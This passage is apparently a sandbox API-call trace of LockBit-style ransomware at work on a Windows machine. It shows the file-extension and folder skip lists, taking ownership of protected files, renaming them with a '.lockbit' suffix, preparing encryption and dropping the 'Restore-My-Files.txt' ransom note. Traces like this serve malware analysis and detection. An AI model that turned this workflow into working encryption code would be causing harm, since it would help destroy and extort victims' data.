(lpString1=".ocx", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0082.761] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0082.762] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0082.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="numbers.xml") returned 1 [0082.762] lstrcmpiW (lpString1="ntldr", lpString2="numbers.xml") returned -1 [0082.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="numbers.xml") returned -1 [0082.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="numbers.xml") returned -1 [0082.762] lstrcmpiW (lpString1="autorun.inf", lpString2="numbers.xml") returned -1 [0082.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0082.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned=".xml" [0082.762] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0082.762] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0082.762] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0082.763] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0082.763] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.lockbit") returned 85 [0082.763] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.763] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.lockbit")) returned 0 [0082.765] GetLastError () returned 0x5 [0082.765] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0082.765] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0082.766] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.766] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0082.766] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0082.766] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0082.767] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0082.768] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0082.776] NtClose (Handle=0x3c4) returned 0x0 [0082.776] RtlFreeAnsiString (AnsiString="\\") [0082.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c4) returned 1 [0082.776] malloc (_Size=0x200) returned 0x53fcc0 [0082.777] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0082.777] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0082.777] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0082.777] CloseHandle (hObject=0x3c4) returned 1 [0082.777] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0082.777] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0082.777] free (_Block=0x53fcc0) [0082.777] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.777] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.lockbit")) returned 1 [0082.778] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.778] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0082.778] malloc (_Size=0x40068) returned 0x206b860 [0082.778] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=209) returned 1 [0082.778] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.783] GetLastError () returned 0x3e5 [0082.783] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0082.783] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0082.783] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.783] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0082.783] lstrcmpiW (lpString1=".", lpString2="oskmenu") returned -1 [0082.783] lstrcmpiW (lpString1="..", lpString2="oskmenu") returned -1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="$windows.~bt") returned 1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="intel") returned 1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="msocache") returned 1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="$recycle.bin") returned 1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="$windows.~ws") returned 1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="tor browser") returned -1 [0082.783] lstrcmpiW (lpString1="oskmenu", lpString2="boot") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="system volume information") returned -1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="perflogs") returned -1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="google") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="application data") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="windows") returned -1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="windows.old") returned -1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="appdata") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="Windows nt") returned -1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="Msbuild") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="Microsoft") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="All users") returned 1 [0082.784] lstrcmpiW (lpString1="oskmenu", lpString2="mozilla") returned 1 [0082.784] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 73 [0082.784] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*") returned 75 [0082.784] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0082.784] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.784] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0082.784] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0082.785] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.785] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0082.785] lstrcmpiW (lpString1=".", lpString2="oskmenubase.xml") returned -1 [0082.785] lstrcmpiW (lpString1="..", lpString2="oskmenubase.xml") returned -1 [0082.785] PathFindExtensionW (pszPath="oskmenubase.xml") returned=".xml" [0082.785] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0082.785] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0082.786] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0082.786] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0082.786] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="oskmenubase.xml") returned 1 [0082.786] lstrcmpiW (lpString1="ntldr", lpString2="oskmenubase.xml") returned -1 [0082.786] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="oskmenubase.xml") returned -1 [0082.786] lstrcmpiW (lpString1="bootsect.bak", lpString2="oskmenubase.xml") returned -1 [0082.786] lstrcmpiW (lpString1="autorun.inf", lpString2="oskmenubase.xml") returned -1 [0082.786] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\") returned="" [0082.786] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned=".xml" [0082.786] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0082.787] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0082.787] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0082.788] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit") returned 97 [0082.788] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.788] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit")) returned 0 [0082.789] GetLastError () returned 0x5 [0082.789] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0082.790] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0082.791] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.791] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0082.791] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0082.791] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0082.791] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0082.791] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0082.800] NtClose (Handle=0x3c0) returned 0x0 [0082.800] RtlFreeAnsiString (AnsiString="\\") [0082.800] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0082.800] malloc (_Size=0x200) returned 0x53fcc0 [0082.800] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0082.800] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0082.800] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0082.800] CloseHandle (hObject=0x3c0) returned 1 [0082.800] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0082.801] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0082.801] free (_Block=0x53fcc0) [0082.801] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.801] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit")) returned 1 [0082.804] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.805] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0082.805] malloc (_Size=0x40068) returned 0x206b860 [0082.805] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=471) returned 1 [0082.805] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.813] GetLastError () returned 0x3e5 [0082.813] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft 